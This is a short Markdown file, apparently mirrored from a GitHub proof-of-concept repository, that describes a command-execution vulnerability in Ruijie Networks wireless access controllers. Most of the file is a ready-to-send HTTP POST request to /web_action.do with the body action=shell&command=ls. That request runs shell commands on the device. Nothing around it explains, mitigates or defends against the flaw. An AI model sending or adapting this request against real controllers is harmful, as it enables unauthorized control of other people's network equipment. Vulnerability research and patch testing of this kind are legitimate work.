mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 10:25:55 +00:00
16 lines
477 B
Markdown
16 lines
477 B
Markdown
|
|
## 锐捷网络无线AC命令执行
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|
## poc
|
||
|
|
```
|
||
|
|
POST /web_action.do HTTP/1.1
|
||
|
|
Host:
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||
|
|
|
||
|
|
action=shell&command=ls
|
||
|
|
```
|
||
|
|
|
||
|
|

|